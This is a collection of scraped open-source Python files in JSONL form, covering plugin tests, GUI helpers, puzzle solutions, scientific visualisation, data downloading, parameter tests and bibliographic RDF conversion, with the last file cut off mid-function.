plugin_params = tlp.getDefaultPluginParameters(plugin_name, self.graph)\n\n plugin_ret = self.graph.applyAlgorithm(plugin_name, plugin_params)\n self.assertTrue(plugin_ret[0])\n\n self.assertIn(out_boolean_param_name, plugin_params)\n self.assertEqual(plugin_params[out_boolean_param_name],\n out_boolean_param_value)\n\n self.assertIn(out_int_param_name, plugin_params)\n self.assertEqual(plugin_params[out_int_param_name],\n out_int_param_value)\n\n self.assertIn(out_float_param_name, plugin_params)\n self.assertEqual(plugin_params[out_float_param_name],\n out_float_param_value)\n\n self.assertIn(out_string_param_name, plugin_params)\n self.assertEqual(plugin_params[out_string_param_name],\n out_string_param_value)\n","repo_name":"Tulip-Dev/tulip","sub_path":"tests/python/test_plugin_registration_and_parameters.py","file_name":"test_plugin_registration_and_parameters.py","file_ext":"py","file_size_in_byte":25105,"program_lang":"python","lang":"en","doc_type":"code","stars":124,"dataset":"github-code","pt":"54"} +{"seq_id":"32616966998","text":"import wx\n\nCOLORS = {'text': wx.Colour(0, 0, 0),\n 'bg': wx.Colour(240,240,230),\n 'nb_active': wx.Colour(254,254,195),\n 'nb_area': wx.Colour(250,250,245),\n 'nb_text': wx.Colour(10,10,180),\n 'nb_activetext': wx.Colour(80,10,10),\n 'title': wx.Colour(80,10,10),\n 'pvname': wx.Colour(10,10,80),\n 'list_bg': wx.Colour(255, 255, 250),\n 'list_fg': wx.Colour(5, 5, 25)}\n\nclass GUIColors(object):\n def __init__(self):\n for key, rgb in COLORS.items():\n setattr(self, key,rgb)\n\ndef set_color(widget, color, bg=None):\n if color not in COLORS:\n color = 'text'\n widget.SetForegroundColour(COLORS[color])\n if bg is not None:\n if bg not in COLORS:\n color = 'bg'\n method = widget.SetBackgroundColour(COLORS[bg])\n","repo_name":"newville/wxutils","sub_path":"wxutils/colors.py","file_name":"colors.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"36458362186","text":"\n\nimport numpy as np\nfrom numpy.core.numeric import count_nonzero\n\nwith open(\"input.txt\") as f:\n text = f.read()\n\nnums = [list(map(int, list(a))) for a in text.splitlines()]\n\ndef calc_most_common_digit(array, num_entries):\n return '1' if count_nonzero(array) >= num_entries / 2 else '0'\n\ndef calc_least_common_digit(array, num_entries):\n return '0' if count_nonzero(array) >= num_entries / 2 else '1'\n\nnum_rows = len(nums[0])\n\ndigits = []\n\nfor i in range(num_rows):\n if len(nums) > 1:\n matrix = np.transpose(np.asarray(nums))\n value = calc_most_common_digit(matrix[i], len(nums))\n nums = [entry for entry in nums if entry[i] == int(value)]\n\n# reset nums\nnums2 = [list(map(int, list(a))) for a in text.splitlines()]\ndigits = []\n\n# calculate CO2 scrubber rating\nfor i in range(num_rows):\n if len(nums2) > 1:\n matrix = np.transpose(np.asarray(nums2))\n value = calc_least_common_digit(matrix[i], len(nums2))\n nums2 = [entry for entry in nums2 if entry[i] == int(value)]\n\nrating1 = \"\".join([str(i) for i in nums[0]])\nrating2 = \"\".join([str(i) for i in nums2[0]])\n\nnum1 = int(rating1, 2)\nnum2 = int(rating2, 2)\n\nprint(num1 * num2)\n\n\n","repo_name":"s-cooper18/advent-of-code-2021","sub_path":"day3.py","file_name":"day3.py","file_ext":"py","file_size_in_byte":1185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"40181591255","text":"from paraview.simple import *\nfrom paravision import ConfigHandler\nimport argparse\nfrom addict import Dict\nfrom paravision.utils import find_preset\n\nfrom rich import print, print_json\n\nfrom paravision.utils import parse_cmdline_args, read_files, view_handler\nfrom paravision.project import projector\n\nfrom paravision.defaults import DEFAULT_CONFIG\n\ndef animate(reader, **kwargs):\n\n config = DEFAULT_CONFIG\n config.update(kwargs)\n\n scalars = config.get('scalars') or reader.PointArrayStatus\n scalarBarVisible = config.get('show_scalar_bar', False)\n geometry = config.get('geometry', [2560, 1440])\n axisVisible = config.get('show_axis', False)\n zoom = config.get('zoom', 1)\n\n animationScene = GetAnimationScene()\n timekeeper = GetTimeKeeper()\n animationScene.UpdateAnimationUsingDataTimeSteps()\n timeArray = reader.TimestepValues\n nts = len(timeArray) or 1\n\n ## TODO: Animate using constant scalarbar range\n ## TODO: Fix animation for one timestep\n\n # try:\n # ## Use last timestep as reference for creating color map\n # animationScene.AnimationTime = reader.TimestepValues[-1]\n # timekeeper.Time = reader.TimestepValues[-1]\n # except:\n # ## for files without time data\n # animationScene.AnimationTime = 0\n # animationScene.StartTime = 0\n # animationScene.EndTime = 0\n # timekeeper.Time = 0\n\n # projection = Projection(reader, projectionType)\n projection = projector(reader, *config.get('project', [None, None, None, None]))\n\n view = GetActiveViewOrCreate('RenderView')\n projectionDisplay = Show(projection, view)\n projectionDisplay.Representation = config.get( 'display_representation' )\n view.OrientationAxesVisibility = int(axisVisible)\n projectionDisplay.RescaleTransferFunctionToDataRange()\n view.ViewSize = geometry\n view.Update()\n\n # setCameraOrientation(zoom)\n view_handler(config['view'], config['zoom'])\n\n for scalar in scalars:\n print(\"Animating\", scalar )\n\n if scalar == 'None':\n ColorBy(projectionDisplay, None)\n else:\n ColorBy(projectionDisplay, ('POINTS', scalar))\n\n # ## NOTE: Removing this should HELP fix the varying scalar bar range for every frame\n # projectionDisplay.RescaleTransferFunctionToDataRange()\n\n ## Find the min/max range of data over all timesteps\n pd_ranges_t = []\n for timestep in range(nts):\n projection.UpdatePipeline(timeArray[timestep])\n pd = projection.PointData\n pd_ranges_t.append(pd.GetArray(scalar).GetRange())\n\n pd_range_min = min(pd_ranges_t)[0]\n pd_range_max = max(pd_ranges_t)[1]\n\n print(f\"Setting color bar range to min/max over all timesteps: {(pd_range_min, pd_range_max)}\")\n\n wLUT = GetColorTransferFunction(scalar)\n wPWF = GetOpacityTransferFunction(scalar)\n HideScalarBarIfNotNeeded(wLUT, view)\n\n wLUT.ApplyPreset(find_preset( config['colormap'] , config['colormap_fuzzy_cutoff']), True)\n\n wLUT.RescaleTransferFunction(pd_range_min, pd_range_max)\n\n view.Update()\n UpdateScalarBars()\n projectionDisplay.SetScalarBarVisibility(view, scalarBarVisible)\n\n SaveAnimation(scalar + '.png', view, ImageResolution=geometry, TransparentBackground=1, SuffixFormat='.%04d')\n\ndef animate_parser(args, local_args_list): \n\n ap = argparse.ArgumentParser()\n\n ap.add_argument(\"FILES\", nargs='*', help=\"files..\")\n\n print(local_args_list)\n\n local_args = ap.parse_args(local_args_list)\n local_args = Dict(vars(local_args))\n\n print_json(data=local_args)\n\n args.update([ (k,v) for k,v in local_args.items() if v is not None])\n\n return args\n\nif __name__==\"__main__\":\n config = ConfigHandler()\n args, local_args_list = config.parse_config_and_cmdline_args()\n args = animate_parser(args, local_args_list)\n reader = read_files(args['FILES'], filetype=args['filetype'])\n\n animate(reader, **args)\n","repo_name":"modsim/ChromaHD-paravision","sub_path":"paravision/animate.py","file_name":"animate.py","file_ext":"py","file_size_in_byte":3992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"38103127849","text":"\"\"\"Download files.\n\nWe use Pooch, a Python library dedicated to fetch data files\nhttps://www.fatiando.org/pooch/latest/index.html\n\nPooch can download a file and verify its integrity with a given hash.\nIt also uses a local cache and downloads data once.\n\"\"\"\n\nimport argparse\nimport pathlib\n\nimport pandas as pd\nimport pooch\n\n\ndef get_cli_arguments():\n \"\"\"Argument parser.\n\n This function parses the name of input files.\n\n Returns\n -------\n argparse.Namespace\n Object containing arguments\n \"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"-i\",\n \"--input\",\n action=\"store\",\n type=str,\n help=\"Input file with file list.\",\n required=True,\n )\n parser.add_argument(\n \"-o\",\n \"--output\",\n action=\"store\",\n type=str,\n help=\"Output directory to download files.\",\n required=True,\n )\n parser.add_argument(\n \"-t\",\n \"--type\",\n action=\"append\",\n type=str,\n help=\"File extensions to to download.\",\n required=True,\n )\n return parser.parse_args()\n\n\ndef verify_file_exists(filename):\n \"\"\"Verify file exists.\n\n Parameters\n ----------\n filename : str\n Name of file to verify existence\n \"\"\"\n file_in = pathlib.Path(filename)\n if not file_in.exists():\n raise FileNotFoundError(f\"File {filename} not found\")\n if not file_in.is_file():\n raise FileNotFoundError(f\"File {filename} is not a file\")\n\n\ndef select_files_to_download(filename, file_types):\n \"\"\"Load and merge datasets and files.\n\n Parameters\n ----------\n filename : str\n Name of file that contains file list\n file_types : list\n File extensions to download\n\n Returns\n -------\n str\n Data repository name\n Pandas dataframe\n Select files dataframe\n \"\"\"\n files = pd.read_csv(filename, sep=\"\\t\")\n print(f\"Found {files.shape[0]} files in {filename}\")\n repository_name = files.iloc[0][\"origin\"]\n print(f\"Data repository: {repository_name}\")\n\n selected_files = files.query(\"from_zip_file == False\").query(\n f\"file_type in {file_types}\"\n )\n print(f\"Select {selected_files.shape[0]} files\")\n return repository_name, selected_files\n\n\nif __name__ == \"__main__\":\n args = get_cli_arguments()\n\n # Verify input files exist\n verify_file_exists(args.input)\n\n # Create output dir\n pathlib.Path(args.output).mkdir(parents=True, exist_ok=True)\n\n print(\"File types to download:\")\n for file_type in args.type:\n print(file_type)\n\n # Select files\n data_repo_name, target_df = select_files_to_download(args.input, args.type)\n\n # Download files\n for idx in target_df.index:\n file_path = pooch.retrieve(\n url=target_df.loc[idx, \"file_url\"],\n known_hash=f\"md5:{target_df.loc[idx, 'file_md5']}\",\n fname=target_df.loc[idx, \"file_name\"],\n path=f\"{args.output}/{data_repo_name}/{target_df.loc[idx, 'dataset_id']}\",\n progressbar=True,\n )\n","repo_name":"GiovanniBussi/mdws","sub_path":"scripts/download_files.py","file_name":"download_files.py","file_ext":"py","file_size_in_byte":3069,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"54"} +{"seq_id":"31611878026","text":"import copy\nimport jax.numpy as jnp\nfrom jax import jit, value_and_grad, lax\nfrom jax.tree_util import tree_map, tree_leaves\nfrom jaxtyping import Float, Array\nfrom dynamax.parameters import ParameterProperties, to_unconstrained, from_unconstrained, log_det_jac_constrain\nimport optax\nimport tensorflow_probability.substrates.jax.bijectors as tfb\nfrom typing import NamedTuple, Union\n\n\nclass InitialParams(NamedTuple):\n probs: Union[Float[Array, \"state_dim\"], ParameterProperties]\n\nclass TransitionsParams(NamedTuple):\n transition_matrix: Union[Float[Array, \"state_dim state_dim\"], ParameterProperties]\n\nclass EmissionsParams(NamedTuple):\n means: Union[Float[Array, \"state_dim emission_dim\"], ParameterProperties]\n scales: Union[Float[Array, \"state_dim emission_dim\"], ParameterProperties]\n\nclass Params(NamedTuple):\n initial: InitialParams\n transitions: TransitionsParams\n emissions: EmissionsParams\n\n\ndef make_params():\n params = Params(\n initial=InitialParams(probs=jnp.ones(3) / 3.0),\n transitions=TransitionsParams(transition_matrix=0.9 * jnp.eye(3) + 0.1 * jnp.ones((3, 3)) / 3),\n emissions=EmissionsParams(means=jnp.zeros((3, 2)), scales=jnp.ones((3, 2)))\n )\n\n props = Params(\n initial=InitialParams(probs=ParameterProperties(trainable=False, constrainer=tfb.SoftmaxCentered())),\n transitions=TransitionsParams(transition_matrix=ParameterProperties(constrainer=tfb.SoftmaxCentered())),\n emissions=EmissionsParams(means=ParameterProperties(), scales=ParameterProperties(constrainer=tfb.Softplus(), trainable=False))\n )\n return params, props\n\n\ndef test_parameter_tofrom_unconstrained():\n params, props = make_params()\n unc_params = to_unconstrained(params, props)\n recon_params = from_unconstrained(unc_params, props)\n assert all(tree_leaves(tree_map(jnp.allclose, params, recon_params)))\n\n\ndef test_parameter_pytree_jittable():\n # If there's a problem with our PyTree registration, this should catch it.\n params, props = make_params()\n\n @jit\n def get_trainable(params, props):\n # test function that includes props in its closure\n return tree_map(lambda node, prop: node if prop.trainable else None,\n params, props,\n is_leaf=lambda node: isinstance(node, ParameterProperties))\n\n # first call, jit\n get_trainable(params, props)\n assert get_trainable._cache_size() == 1\n\n # change param values, don't jit\n params = params._replace(initial=params.initial._replace(probs=jnp.zeros(3)))\n get_trainable(params, props)\n assert get_trainable._cache_size() == 1\n\n # change param dtype, jit\n params = params._replace(initial=params.initial._replace(probs=jnp.zeros(3, dtype=int)))\n get_trainable(params, props)\n assert get_trainable._cache_size() == 2\n\n # change props, jit\n props.transitions.transition_matrix.trainable = False\n get_trainable(params, props)\n assert get_trainable._cache_size() == 3\n\n\ndef test_parameter_constrained():\n \"\"\"Test that only trainable params are updated in gradient descent.\n \"\"\"\n params, props = make_params()\n original_params = copy.deepcopy(params)\n\n unc_params = to_unconstrained(params, props)\n def loss(unc_params):\n params = from_unconstrained(unc_params, props)\n log_initial_probs = jnp.log(params.initial.probs)\n log_transition_matrix = jnp.log(params.transitions.transition_matrix)\n means = params.emissions.means\n scales = params.emissions.scales\n\n lp = log_initial_probs[1]\n lp += log_transition_matrix[0,0]\n lp += log_transition_matrix[1,1]\n lp += log_transition_matrix[2,2]\n lp += jnp.sum(-0.5 * (1.0 - means[0])**2 / scales[0]**2)\n lp += jnp.sum(-0.5 * (2.0 - means[1])**2 / scales[1]**2)\n lp += jnp.sum(-0.5 * (3.0 - means[2])**2 / scales[2]**2)\n return -lp\n\n # Run a dummy optimization\n f = jit(value_and_grad(loss))\n optimizer = optax.adam(1e-2)\n opt_state = optimizer.init(unc_params)\n\n def step(carry, args):\n unc_params, opt_state = carry\n loss, grads = f(unc_params)\n updates, opt_state = optimizer.update(grads, opt_state)\n unc_params = optax.apply_updates(unc_params, updates)\n return (unc_params, opt_state), loss\n\n initial_carry = (unc_params, opt_state)\n (unc_params, opt_state), losses = \\\n lax.scan(step, initial_carry, None, length=10)\n params = from_unconstrained(unc_params, props)\n\n assert jnp.allclose(params.initial.probs, original_params.initial.probs)\n assert not jnp.allclose(params.transitions.transition_matrix, original_params.transitions.transition_matrix)\n assert not jnp.allclose(params.emissions.means, original_params.emissions.means)\n assert jnp.allclose(params.emissions.scales, original_params.emissions.scales)\n\n\ndef test_logdet_jacobian():\n params, props = make_params()\n unc_params = to_unconstrained(params, props)\n logdet = log_det_jac_constrain(params, props)\n\n # only the transition matrix is constrained and trainable\n f = props.transitions.transition_matrix.constrainer.forward_log_det_jacobian\n logdet_manual = f(unc_params.transitions.transition_matrix).sum()\n assert jnp.isclose(logdet, logdet_manual)\n","repo_name":"probml/dynamax","sub_path":"dynamax/parameters_test.py","file_name":"parameters_test.py","file_ext":"py","file_size_in_byte":5304,"program_lang":"python","lang":"en","doc_type":"code","stars":488,"dataset":"github-code","pt":"54"} +{"seq_id":"28339966396","text":"\"\"\"\nSettingsDialog class.\n\"\"\"\n\n__author__ = \"James Cook\"\n__copyright__ = \"Copyright 2021\"\n__license__ = \"GNU General Public License v3.0\"\n__version__ = \"1.0.0\"\n__maintainer__ = \"James Cook\"\n__email__ = \"contact@cookjames.uk\"\n\n\n# external module imports\nfrom PyQt5.QtWidgets import QDialog\n\n# project module imports\nfrom qtgui.gen import SettingsDialogGenerated\nfrom qtgui.logger import init_console_logger\nfrom core.image_processing import colormaps\n\n# setup logger\nlogger = init_console_logger(name=\"settings_dialog\")\n\n\nclass SettingsDialog(QDialog):\n def __init__(self, config):\n super(QDialog, self).__init__()\n\n self.ui = SettingsDialogGenerated.Ui_Dialog()\n self.ui.setupUi(self)\n\n self.config = config\n self._temp_unit_index_selected = 0\n self.unit_texts = ['\\xB0C', '\\xB0F', 'K']\n\n self.init_widgets()\n self.load_settings()\n self.init_signals() # IMPORTANT - DO THIS LAST\n\n def init_signals(self):\n \"\"\"\n Initialises widget signals.\n \"\"\"\n self.ui.pushButton_apply.clicked.connect(self.apply_and_accept)\n self.ui.comboBox_temp_unit.currentIndexChanged.connect(self.temp_unit_changed)\n\n def init_widgets(self):\n \"\"\"\n Sets possible values for selection widgets.\n \"\"\"\n self.ui.comboBox_temp_unit.addItems([\"Celsius\", \"Fahrenheit\", \"Kelvin\"])\n self.ui.comboBox_colormap.addItems(colormaps)\n self.ui.comboBox_model.addItems([\"Standard\", \"Lightweight\"])\n\n def load_settings(self):\n \"\"\"\n Loads settings from the configuration dictionary passed.\n \"\"\"\n # set temp unit option\n index = self.ui.comboBox_temp_unit.findText(self.config[\"SETTINGS\"][\"temp_unit\"])\n if index == -1:\n index = 0\n logger.error(\"Error loading 'temp_unit' configuration.\")\n self.ui.comboBox_temp_unit.setCurrentIndex(index)\n self._temp_unit_index_selected = index\n self.ui.label_temp_unit.setText('(' + self.unit_texts[index] + ')')\n\n # set colormap option\n index = self.ui.comboBox_colormap.findText(self.config[\"SETTINGS\"][\"color_map\"])\n if index == -1:\n index = 0\n logger.error(\"Error loading 'color_map' configuration.\")\n self.ui.comboBox_colormap.setCurrentIndex(index)\n\n # set sound option\n try:\n enabled = bool(int(self.config[\"SETTINGS\"][\"sound\"]))\n except ValueError:\n enabled = True\n logger.error(\"Error loading 'sound' configuration.\")\n self.ui.checkBox_sound.setChecked(enabled)\n\n # set fps option\n try:\n enabled = bool(int(self.config[\"SETTINGS\"][\"fps\"]))\n except ValueError:\n enabled = True\n logger.error(\"Error loading 'fps' configuration.\")\n self.ui.checkBox_fps.setChecked(enabled)\n\n # set model option\n index = self.ui.comboBox_model.findText(self.config[\"SETTINGS\"][\"model\"])\n if index == -1:\n index = 0\n logger.error(\"Error loading 'model' configuration.\")\n self.ui.comboBox_model.setCurrentIndex(index)\n\n # set temp option\n try:\n value = float(self.config[\"SETTINGS\"][\"temp_thresh\"])\n except (ValueError, AssertionError):\n value = 38.0\n logger.error(\"Error loading 'temp_thresh' configuration.\")\n self.ui.doubleSpinBox_temp_thresh.setValue(value)\n\n # set confidence option\n try:\n value = float(self.config[\"SETTINGS\"][\"confidence_thresh\"])\n assert (0.0 <= value <= 1)\n except (ValueError, AssertionError):\n value = 0.5\n logger.error(\"Error loading 'confidence_thresh' configuration.\")\n self.ui.doubleSpinBox_confidence_thresh.setValue(value)\n\n def temp_unit_changed(self):\n \"\"\"\n Converts the values of temperatures displayed depending on\n the temperature unit selected.\n\n Called when the temperature unit is changed.\n \"\"\"\n value = self.ui.doubleSpinBox_temp_thresh.value()\n new_index = self.ui.comboBox_temp_unit.currentIndex()\n\n # from Celsius\n if self._temp_unit_index_selected == 0:\n if new_index == 1:\n value = celsius_to_fahrenheit(value)\n elif new_index == 2:\n value = celsius_to_kelvin(value)\n\n # from Fahrenheit\n elif self._temp_unit_index_selected == 1:\n if new_index == 0:\n value = fahrenheit_to_celsius(value)\n elif new_index == 2:\n value = fahrenheit_to_kelvin(value)\n\n # from Kelvin\n elif self._temp_unit_index_selected == 2:\n if new_index == 0:\n value = kelvin_to_celsius(value)\n elif new_index == 1:\n value = kelvin_to_fahrenheit(value)\n\n else:\n raise Exception(\"Selected index '{}' of 'comboBox_temp_unit' not found\".format(\n self._temp_unit_index_selected))\n\n self.ui.doubleSpinBox_temp_thresh.setValue(value)\n self.ui.label_temp_unit.setText('(' + self.unit_texts[new_index] + ')')\n self._temp_unit_index_selected = new_index\n\n def apply_and_accept(self):\n \"\"\"\n Applies configurations and exits.\n \"\"\"\n self.apply_settings()\n self.accept()\n\n def apply_settings(self):\n \"\"\"\n Applies selected settings to the config dictionary.\n \"\"\"\n self.config[\"SETTINGS\"][\"temp_unit\"] = str(self.ui.comboBox_temp_unit.currentText())\n self.config[\"SETTINGS\"][\"color_map\"] = str(self.ui.comboBox_colormap.currentText())\n self.config[\"SETTINGS\"][\"sound\"] = str(int(self.ui.checkBox_sound.isChecked()))\n self.config[\"SETTINGS\"][\"fps\"] = str(int(self.ui.checkBox_fps.isChecked()))\n self.config[\"SETTINGS\"][\"model\"] = str(self.ui.comboBox_model.currentText())\n self.config[\"SETTINGS\"][\"temp_thresh\"] = str(self.ui.doubleSpinBox_temp_thresh.value())\n self.config[\"SETTINGS\"][\"confidence_thresh\"] = str(self.ui.doubleSpinBox_confidence_thresh.value())\n\n\ndef kelvin_to_celsius(value):\n return value - 273.15\n\n\ndef celsius_to_kelvin(value):\n return value + 273.15\n\n\ndef kelvin_to_fahrenheit(value):\n return (value - 273.15) * 1.8 + 32\n\n\ndef fahrenheit_to_kelvin(value):\n return (value - 32) * (5/9) + 273.15\n\n\ndef celsius_to_fahrenheit(value):\n return (value * 1.8) + 32\n\n\ndef fahrenheit_to_celsius(value):\n return (value - 32) * (5/9)\n","repo_name":"dev-chip/fever-monitor","sub_path":"qtgui/settings_dialog.py","file_name":"settings_dialog.py","file_ext":"py","file_size_in_byte":6542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"14769919767","text":"\nimport mlrun\nimport pandas as pd\nimport os\n\nDF_URL = os.environ[\"DF_URL\"]\ndf = None\n\n\ndef init_context(context):\n global df\n context.logger.info(\"retrieve data from {}\".format(DF_URL))\n di = mlrun.run.get_dataitem(DF_URL)\n df = di.as_df()\n\n\ndef handler(context, event):\n global df\n if df is None:\n return context.Response(\n body=\"\", headers={}, content_type=\"application/json\", status_code=500\n )\n\n # mock REST api\n method = event.method\n path = event.path\n fields = event.fields\n\n id = False\n\n # pagination\n page = 0\n pageSize = 50\n\n if \"page\" in fields:\n page = int(fields['page'])\n\n if \"size\" in fields:\n pageSize = int(fields['size'])\n\n if page < 0:\n page = 0\n\n if pageSize < 1:\n pageSize = 1\n\n if pageSize > 100:\n pageSize = 100\n\n start = page * pageSize\n end = start + pageSize\n total = len(df)\n\n if end > total:\n end = total\n\n ds = df.iloc[start:end]\n json = ds.to_json(orient=\"records\")\n\n res = {\"data\": json, \"page\": page, \"size\": pageSize, \"total\": total}\n\n return context.Response(\n body=res, headers={}, content_type=\"application/json\", status_code=200\n )\n","repo_name":"scc-digitalhub/digitalhub","sub_path":"documentation/examples/etl/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1227,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"13420357592","text":"from __future__ import print_function\n\n\"\"\"IMPORT DEPENDENCIES\"\"\"\nimport os\nimport sys\nimport pandas as pd\n\n\"\"\"IMPORT INTERNAL DEPENDENCIES\"\"\"\nfrom .utils import add_directory, get_files\nfrom .parallel import parallelize\n\n\"\"\"Generate read distribution profiles\"\"\"\ndef run_fastqc(\n args):\n\n file, args_dict = args[0], args[1]\n\n os.system(\n 'fastqc'\n + ' -q ' + str(args_dict['input']) + str(file)\n + ' -o ' + str(args_dict['fastqc'])\n + str(args_dict['log']))\n\n\"\"\"Parellel run of FastQC\"\"\"\ndef get_fastqc(args_dict):\n\n args_dict = add_directory(\n args_dict,\n 'output',\n 'fastqc')\n\n files = get_files(\n args_dict['input'],\n ['.fastq', '.fq', '.txt'])\n\n # Perform fastqc on each file and unzip output\n parallelize(\n run_fastqc,\n files,\n args_dict,\n mod_workers = True)\n\n\"\"\"Create MultiQC processing summary from all files in args_dict output\"\"\"\ndef get_multiqc_summary(\n args_dict):\n\n os.system(\n 'multiqc'\n + ' ' + str(args_dict['output'])\n + ' -i ' + str(args_dict['experiment'])\n + ' -o ' + args_dict['output']\n + str(args_dict['log']))\n","repo_name":"XPRESSyourself/XPRESSpipe","sub_path":"xpresspipe/quality.py","file_name":"quality.py","file_ext":"py","file_size_in_byte":1197,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"54"} +{"seq_id":"5660065429","text":"import json\nimport os,sys,inspect\nimport time\n\n\ncurrentdir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))\nparentdir = os.path.dirname(currentdir)\nsys.path.insert(0,parentdir) \n\nfrom utils import translator\n\ninput_json_filepath = '../../resources/json_files/custom_QnA_dataset.json'\n\ntrans = 'bing'\n\nf = open(input_json_filepath, encoding='utf16')\njson_data = json.load(f)['collection']\n\n# Large text evaluation\n\n\nel_to_en = []\nen_to_el = []\n\nfor context_with_qna in json_data[:2]:\n start = time.time()\n translated_text = translator.translate(context_with_qna['context'] , trans, 'el', 'en')\n end = time.time()\n el_to_en.append({\"characters\": len(context_with_qna['context']) , \"time\":(end-start) })\n\n for question in context_with_qna['questions']:\n # For el to en\n start = time.time()\n translated_text = translator.translate(question , trans, 'el', 'en')\n end = time.time()\n el_to_en.append({\"characters\": len(question) , \"time\":(end-start) })\n\n start = time.time()\n translated_text = translator.translate(translated_text, trans, 'en', 'el')\n end = time.time()\n en_to_el.append({\"characters\": len(question) , \"time\":(end-start) })\n\nsum = 0\nfor dict in el_to_en:\n sum += dict['time']\n\nfor dict in en_to_el:\n sum += dict['time']\n\naverage_time = sum / (len(el_to_en) + len(en_to_el))\nprint('Average translation time of ' + trans + ' is ' + str(average_time) + ' seconds.')\n","repo_name":"Rantaplanb/question-answering-evaluation","sub_path":"evaluation/translators_evaluation/evaluate_translators_time_efficiency.py","file_name":"evaluate_translators_time_efficiency.py","file_ext":"py","file_size_in_byte":1483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"38212433305","text":"from nmk.utils import create_dir_symlink\nfrom tests.utils import NmkTester\n\n\nclass TestUtils(NmkTester):\n def test_symlink(self):\n # Create sample folder\n foo = self.test_folder / \"foo\"\n foo.mkdir()\n foo_file = foo / \"sample.txt\"\n foo_file.touch()\n\n # Create link and verify content\n bar = self.test_folder / \"bar\"\n create_dir_symlink(foo, bar)\n bar_file = bar / \"sample.txt\"\n assert bar_file.is_file()\n","repo_name":"dynod/nmk","sub_path":"src/tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"26362536770","text":"import sys\nimport os\nimport docker\nimport requests\nimport rdflib\nimport subprocess\nfrom time import sleep\nimport json\nimport click\nimport re\nfrom bs4 import BeautifulSoup\nimport logging\nimport pdftotext\nfrom urlextract import URLExtract\nfrom os.path import exists\n\n\"\"\"\nTurn lots of things into RDF.\nUse the Zotero Translation Server (https://github.com/zotero/translation-server)\nvia Docker to do most of it.\n\nUsage:\n\n$ python toRDF.py start\n\n$ python toRDF.py url 'https://heinonline.org/HOL/LandingPage?handle=hein.journals/wflr49&div=16&id=&page='\n\n$ python toRDF.py book \"Weapons of Math Destruction\"\n\n$ python toRDF.py identifier 10.1177/2053951714559253\n\n$ python toRDF.py bibtex references.bib\n\"\"\"\n\nlogging.basicConfig(level=logging.DEBUG)\n\n@click.group()\ndef cli():\n \"\"\" Translate lots of book/article identifiers into RDF.\"\"\"\n pass\n\n@cli.command()\ndef start():\n \"\"\" Start the Zotero translation server in a Docker container.\"\"\"\n client = docker.from_env()\n container = client.containers.run(\"zotero/translation-server\",\n detach=True, ports={1969:1969}, tty=True,\n stdin_open=True)\n myContainer = [cont for cont in client.containers.list() if cont == container][0]\n while myContainer.status != 'running':\n logging.info('Waiting for container to start...')\n sleep(1)\n click.echo(f\"Container ID: {myContainer}\")\n\n\n@cli.command()\n@click.argument('query', nargs=1)\ndef stop():\n \"\"\" Stop the Zotero translation server.\"\"\"\n myContainer.stop()\n\n\ndef translateURL(url):\n \"\"\"\n Get bibliographic information from a URL.\n \"\"\"\n # print(f\"Translating URL: {url}\")\n response = requests.post(\"http://127.0.0.1:1969/web\",\n data=url,\n headers={'Content-Type': 'text/plain'})\n if response.ok:\n response.encoding='utf-8'\n return response.text\n\ndef translateJSON(zoteroJSON):\n \"\"\"\n Convert the JSON format that translateURL() returns into Bibliontology RDF.\n \"\"\"\n response = requests.post('http://127.0.0.1:1969/export',\n data=zoteroJSON.encode('utf-8'),\n params={\"format\": \"rdf_bibliontology\"},\n headers={\"Content-Type\": \"application/json\"})\n if response.ok:\n return response.text\n\ndef translateBibtex(bibtex):\n \"\"\" Given a bibtex file (really a string),\n send that file to the Zotero translation server to translate it to RDF.\"\"\"\n\n if type(bibtex) != str:\n try:\n bibtex = bibtex.decode('utf-8')\n except:\n logging.error(\"I can't translate bytes or other things. You gotta give me a string!\")\n exit()\n bibtex = bibtex.encode('utf-8')\n response = requests.post('http://127.0.0.1:1969/import',\n data=bibtex,\n headers={\"Content-Type\": \"text/plain; charset=utf-8\"})\n if response.ok:\n return translateJSON(response.text)\n else:\n logging.error(\"Something went wrong while trying to convert bibtex.\")\n return\n\n\ndef ident2rdf(ident):\n \"\"\"\n Translate an identifier to RDF, where that identifier is one of a DOI, ISBN, arXiv ID, etc.\n \"\"\"\n response = requests.post('http://127.0.0.1:1969/search',\n data=ident,\n params={\"format\": \"rdf_bibliontology\"},\n headers={\"Content-Type\": \"text/plain\"})\n zoteroJSON = response.text if response.ok else None\n try:\n decodedJSON = json.dumps(json.loads(zoteroJSON))\n except:\n print(f\"Couldn't translate identifier: {ident}\")\n print(zoteroJSON)\n return None\n return translateJSON(decodedJSON)\n\n\ndef url2rdf(url):\n \"\"\" Converts a URL to RDF/XML. \"\"\"\n zoteroJSON = translateURL(url)\n try:\n decodedJSON = json.dumps(json.loads(zoteroJSON))\n except:\n print(f\"Couldn't translate url: {url}\")\n return None\n return translateJSON(decodedJSON)\n\n\ndef getPDFSyllabus(url, courseID):\n # Do we have it already?\n cacheFilename = f\"../syllabi/{courseID}.pdf\"\n if exists(cacheFilename):\n f = open(cacheFilename)\n else:\n f, content = downloadFile(url, '../syllabi', courseID)\n # Convert to text\n pdf = pdftotext.PDF(f)\n pdfText = \"\\n\\n\".join(pdf)\n f.close()\n return pdfText\n\n\ndef getHTMLSyllabus(url, courseID):\n \"\"\" Download a HTML syllabus.\"\"\"\n # First see if we haven't already downloaded it.\n cacheFilename = f\"../syllabi/{courseID}.html\"\n isCacheFile = exists(cacheFilename)\n if isCacheFile: # We already have it. Use the cached version\n with open(cacheFilename) as f:\n return 